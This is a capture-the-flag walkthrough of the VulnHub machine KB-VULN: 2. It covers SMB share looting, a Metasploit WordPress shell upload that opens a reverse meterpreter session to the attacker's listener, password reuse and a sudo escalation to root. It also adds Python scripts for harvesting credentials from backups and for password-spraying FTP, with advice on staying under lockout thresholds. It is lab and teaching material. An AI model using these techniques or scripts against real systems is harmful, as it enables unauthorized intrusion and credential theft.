KB Vuln 2
Author: jason_huawen
Target machine basics
Name: KB-VULN: 2
URL:
https://www.vulnhub.com/entry/kb-vuln-2,562/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.89.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:93:01:25 1 60 PCS Systemtechnik GmbH
192.168.56.222 08:00:27:f1:58:96 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.222.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.222 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 01:58 EST
Nmap scan report for localhost (192.168.56.222)
Host is up (0.00019s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA)
| 256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA)
|_ 256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:F1:58:96 (Oracle VirtualBox virtual NIC)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-11-26T06:58:58
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: kb-server
| NetBIOS computer name: UBUNTU\x00
| Domain name: \x00
| FQDN: kb-server
|_ System time: 2022-11-26T06:58:58+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.10 seconds
The Nmap scan shows five open ports on the target: 21 (FTP, vsftpd 3.0.3), 22 (SSH), 80 (HTTP, serving the Apache default page), 139 and 445 (Samba 4.7.6). Note that the SMB host scripts already ran as guest (account_used: guest), a strong hint that an unauthenticated share exists.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ftp 192.168.56.222
Connected to 192.168.56.222.
220 (vsFTPd 3.0.3)
Name (192.168.56.222:kali): anonymous
530 Permission denied.
ftp:
The target's FTP service refuses anonymous logins; local user logins are still possible, which matters later.
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ smbclient //192.168.56.222/Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 17 06:58:56 2020
.. D 0 Wed Sep 16 06:36:09 2020
backup.zip N 16735117 Thu Sep 17 06:58:56 2020
14380040 blocks of size 1024. 8813164 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> get backup.zip
getting file \backup.zip of size 16735117 as backup.zip (103435.9 KiloBytes/sec) (average 103436.0 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ls
backup.zip nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ unzip backup.zip
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ ls
backup.zip nmap_full_scan remember_me.txt wordpress
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ cat remember_me.txt
Username:admin
Password:MachineBoy141
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2]
└─$ cd wordpress
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ ls -alh
total 228K
drwxr-xr-x 6 kali kali 4.0K Sep 16 2020 .
drwxr-xr-x 3 kali kali 4.0K Nov 26 02:02 ..
-rw-r--r-- 1 kali kali 481 Sep 16 2020 .htaccess
-rwxrwxrwx 1 kali kali 405 Sep 16 2020 index.php
-rwxrwxrwx 1 kali kali 20K Sep 16 2020 license.txt
-rwxrwxrwx 1 kali kali 7.2K Sep 16 2020 readme.html
drwxrwxrwx 2 kali kali 4.0K Sep 16 2020 uploads
-rwxrwxrwx 1 kali kali 7.0K Sep 16 2020 wp-activate.php
drwxrwxrwx 9 kali kali 4.0K Sep 16 2020 wp-admin
-rwxrwxrwx 1 kali kali 351 Sep 16 2020 wp-blog-header.php
-rwxrwxrwx 1 kali kali 2.3K Sep 16 2020 wp-comments-post.php
-rw-rw-rw- 1 kali kali 3.2K Sep 16 2020 wp-config.php
-rwxrwxrwx 1 kali kali 2.9K Sep 16 2020 wp-config-sample.php
drwxrwxrwx 6 kali kali 4.0K Sep 16 2020 wp-content
-rwxrwxrwx 1 kali kali 3.9K Sep 16 2020 wp-cron.php
drwxrwxrwx 24 kali kali 12K Sep 16 2020 wp-includes
-rwxrwxrwx 1 kali kali 2.5K Sep 16 2020 wp-links-opml.php
-rwxrwxrwx 1 kali kali 3.3K Sep 16 2020 wp-load.php
-rwxrwxrwx 1 kali kali 48K Sep 16 2020 wp-login.php
-rwxrwxrwx 1 kali kali 8.4K Sep 16 2020 wp-mail.php
-rwxrwxrwx 1 kali kali 20K Sep 16 2020 wp-settings.php
-rwxrwxrwx 1 kali kali 31K Sep 16 2020 wp-signup.php
-rwxrwxrwx 1 kali kali 4.7K Sep 16 2020 wp-trackback.php
-rwxrwxrwx 1 kali kali 3.2K Sep 16 2020 xmlrpc.php
This appears to be a backup of the target site, and it has already handed over a username and password (far too easy!):
Username: admin
Password: MachineBoy141
Next we need to find where this WordPress instance is actually served from.
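Before hunting for the live site, it pays to sweep the whole backup rather than stopping at the first note: wp-config.php (present in the listing above but never opened in this write-up) carries the database credentials, and those are frequently reused elsewhere on the box. The script below is an added example, not code from the original write-up; it walks an extracted backup and pulls out WordPress define() constants plus Username:/Password: style notes. The sample tree it builds is constructed: remember_me.txt mirrors the page, the wp-config.php values are placeholders, and the file-type heuristics are assumptions.

```python
import re
import tempfile
from pathlib import Path

# WordPress keeps its secrets as define( 'DB_PASSWORD', '...' ) in wp-config.php
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
# Plain-text notes in the remember_me.txt style: "Username:admin", "Password: x"
NOTE_RE = re.compile(r"^\s*(username|user|login|password|pass)\s*[:=]\s*(\S+)", re.IGNORECASE)
WP_KEYS = {"DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST"}
# Assumption: plain-text notes hide in these extensions or in "note"-like names
NOTE_SUFFIXES = {".txt", ".md", ".bak", ".old", ".conf", ".ini"}


def harvest_credentials(root: Path) -> dict:
    """Walk an extracted backup and return {relative_path: {key: value}} for
    every file that yields a credential-looking value."""
    found = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = {}
        if path.name == "wp-config.php":
            for key, value in DEFINE_RE.findall(text):
                if key in WP_KEYS:
                    hits[key] = value
            prefix = re.search(r"\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]", text)
            if prefix:
                hits["table_prefix"] = prefix.group(1)   # needed to find the wp_users table later
        elif path.suffix.lower() in NOTE_SUFFIXES or "note" in path.name.lower():
            for line in text.splitlines():
                note = NOTE_RE.match(line)
                if note:
                    hits[note.group(1).lower()] = note.group(2)
        if hits:
            found[path.relative_to(root).as_posix()] = hits
    return found


def build_sample_backup() -> Path:
    """Construct a throw-away backup tree. remember_me.txt matches the page;
    the wp-config.php values are invented placeholders, not the target's."""
    root = Path(tempfile.mkdtemp(prefix="backup_"))
    (root / "remember_me.txt").write_text("Username:admin\nPassword:MachineBoy141\n")
    wp = root / "wordpress"
    wp.mkdir()
    (wp / "wp-config.php").write_text(
        "<?php\n"
        "define( 'DB_NAME', 'wordpress' );\n"
        "define( 'DB_USER', 'wpuser' );\n"
        "define( 'DB_PASSWORD', 'ExamplePass123' );\n"
        "define( 'DB_HOST', 'localhost' );\n"
        "$table_prefix = 'wp_';\n"
    )
    (wp / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
    return root


if __name__ == "__main__":
    for rel, hits in harvest_credentials(build_sample_backup()).items():
        print(rel)
        for key, value in hits.items():
            print(f"  {key} = {value}")
```

Point it at the real extraction directory (harvest_credentials(Path("."))) and add every value it returns to the list of candidates to test against SSH, FTP and su; the DB_USER/DB_PASSWORD pair and the table prefix also tell you where the wp_users hashes live if database access turns up.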
Browsing to port 80 only returns the Apache default page, so the path has to be enumerated.
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ gobuster dir -u http://192.168.56.222 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.222
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/26 02:06:58 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.222/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 218439 / 220561 (99.04%)
===============================================================
2022/11/26 02:07:25 Finished
===============================================================
Going to the WordPress admin backend at http://192.168.56.222/wordpress/wp-admin, the browser is redirected to kb.vuln (presumably the site URL WordPress is configured with), so that name has to be mapped to the target in /etc/hosts.
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/KB_Vuln2/wordpress]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.222 kb.vuln
Visiting http://192.168.56.222/wordpress/wp-admin again, the admin backend accepts the username and password recovered from the SMB share.
The next step is to get a PHP shell (shell.php) onto the target.
Editing the theme's 404 template and clicking Update File fails with:
Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.
This is the file editor's loopback check (WordPress requests its own site URL to make sure the edited file does not fatal), not an access control; it fails here most likely because the site URL is kb.vuln, which the target itself cannot resolve.
Instead, use Metasploit to upload the shell:
msf6 > search wp_admin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.222
RHOSTS => 192.168.56.222
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD MachineBoy141
PASSWORD => MachineBoy141
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   MachineBoy141    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.222   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /wordpress       yes       The base path to the wordpress application
   USERNAME   admin            yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.206   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   WordPress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Authenticating with WordPress using admin:MachineBoy141...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wordpress/wp-content/plugins/JQkJgJRXdS/NVsrEleybA.php...
[*] Sending stage (39927 bytes) to 192.168.56.222
[+] Deleted NVsrEleybA.php
[+] Deleted JQkJgJRXdS.php
[+] Deleted ../JQkJgJRXdS
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.222:50046) at 2022-11-26 02:50:30 -0500
meterpreter > sessions
Usage: sessions <id>
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>
meterpreter > shell
Process 3607 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
sh: 0: getcwd() failed: No such file or directory
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
www-data@kb-server:$
We have a shell as www-data. The getcwd() errors are harmless: the module deleted the plugin directory it executed from (the Deleted lines above), so the process's working directory no longer exists, and any cd clears them. After changing to /home/kbadmin:
www-data@kb-server:/home/kbadmin$ ls -alh
ls -alh
total 44K
drwxr-xr-x 5 kbadmin kbadmin 4.0K Sep 17 2020 .
drwxr-xr-x 3 root root 4.0K Sep 16 2020 ..
-rw------- 1 kbadmin kbadmin 16 Sep 17 2020 .bash_history
-rw-r--r-- 1 kbadmin kbadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 kbadmin kbadmin 3.7K Apr 4 2018 .bashrc
drwx------ 2 kbadmin kbadmin 4.0K Sep 16 2020 .cache
drwx------ 3 kbadmin kbadmin 4.0K Sep 16 2020 .gnupg
drwxrwxr-x 3 kbadmin kbadmin 4.0K Sep 16 2020 .local
-rw-r--r-- 1 kbadmin kbadmin 807 Apr 4 2018 .profile
-rw-r--r-- 1 root root 12 Sep 16 2020 note.txt
-rw-r--r-- 1 root root 33 Sep 16 2020 user.txt
www-data@kb-server:/home/kbadmin$ cat user.txt
cat user.txt
03bf4d20dac5644c75e69e40bad48db0
www-data@kb-server:/home/kbadmin$ cat note.txt
cat note.txt
use DOCKER!
www-data@kb-server:/home/kbadmin$ docker images
docker images
Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Get http://%2Fvar%2Frun%2Fdocker.sock/v1.40/images/json: dial unix /var/run/docker.sock: connect: permission denied
www-data cannot open /var/run/docker.sock, so the hint in note.txt is not directly usable from this account.
Privilege escalation
www-data@kb-server:/etc$ su - kbadmin
su - kbadmin
Password: MachineBoy141
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kbadmin@kb-server:~$ sudo -l
sudo -l
[sudo] password for kbadmin: MachineBoy141
Matching Defaults entries for kbadmin on kb-server:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kbadmin may run the following commands on kb-server:
(ALL : ALL) ALL
kbadmin@kb-server:~$ sudo -u root /bin/bash
sudo -u root /bin/bash
root@kb-server:~# cd /root
cd /root
root@kb-server:/root# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4.0K Sep 17 2020 .
drwxr-xr-x 25 root root 4.0K Sep 16 2020 ..
-rw------- 1 root root 80 Sep 17 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 33 Sep 16 2020 flag.txt
drwxr-xr-x 3 root root 4.0K Sep 16 2020 .local
-rw------- 1 root root 1.1K Sep 17 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Sep 16 2020 .ssh
root@kb-server:/root# cat flag.txt
cat flag.txt
dc387b4cf1a4143f562dd1bdb3790ff1
root@kb-server:/root#
Once the username kbadmin was known, I tried cracking SSH and FTP with hydra in several ways without success; in fact kbadmin's password is the same as admin's (MachineBoy141), which is what the su above relied on.
Lessons learned
- Sometimes tools and wordlists will not crack a credential; try the information already in hand first.
- The note.txt left by the author looks like a red herring, because either way a shell as kbadmin is needed. During the solve the line of thinking was right, namely to obtain kbadmin's password; only the correct route to it was missed.
- With the WordPress admin username and password, besides trying to upload shell.php (for example through Media, which rejects .php files by default) or editing the 404 template, there is a third route: Metasploit's wp_admin_shell_upload module.
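For the point about reuse (the hydra attempts described above and the first lesson): the cheap test is every recovered password against every discovered user, before any wordlist. The script below is an added example, not code from the write-up. It uses FTP because vsftpd on the target accepts local logins (only anonymous was refused) and ftplib is in the standard library; the same ordering applies to su or SSH. The host and the user list come from the write-up and admin/MachineBoy141 is the pair from the share; everything else is an assumption.

```python
import ftplib


def build_attempts(users, passwords, known_pairs=()):
    """Order the login attempts: pairs already known to be valid somewhere come
    first, then every recovered password against every discovered user.
    Reuse is far more likely than a fresh wordlist hit, so this runs before hydra.
    Duplicates are dropped while preserving order."""
    seen, attempts = set(), []
    for user, pw in list(known_pairs) + [(u, p) for p in passwords for u in users]:
        if (user, pw) not in seen:
            seen.add((user, pw))
            attempts.append((user, pw))
    return attempts


def ftp_login_ok(host, user, password, timeout=5):
    """True only on a 230 (logged in). A 530 raises error_perm -> False;
    refused connections, timeouts and protocol errors are also False."""
    try:
        with ftplib.FTP() as ftp:
            ftp.connect(host, 21, timeout=timeout)
            ftp.login(user, password)
            return True
    except ftplib.error_perm:
        return False
    except (ftplib.Error, OSError):
        return False


def spray_ftp(host, attempts):
    """One connection per attempt, sequentially, stopping per user at the first
    success. Keep it this slow on real targets: vsftpd logs every failure and
    lockout tooling keys on bursts of 530 responses."""
    valid, solved = [], set()
    for user, pw in attempts:
        if user in solved:
            continue
        if ftp_login_ok(host, user, pw):
            valid.append((user, pw))
            solved.add(user)
    return valid


if __name__ == "__main__":
    users = ["kbadmin", "admin"]                    # /home/kbadmin and the backup note
    passwords = ["MachineBoy141"]                   # from remember_me.txt
    attempts = build_attempts(users, passwords, known_pairs=[("admin", "MachineBoy141")])
    for user, pw in spray_ftp("192.168.56.222", attempts):
        print(f"valid FTP login: {user}:{pw}")
```

A hit here would have given kbadmin's credentials straight from the attacker box, without first needing the WordPress shell; on an engagement, keep the attempt list small and the pace slow so the test does not trip account lockouts or flood the target's auth log.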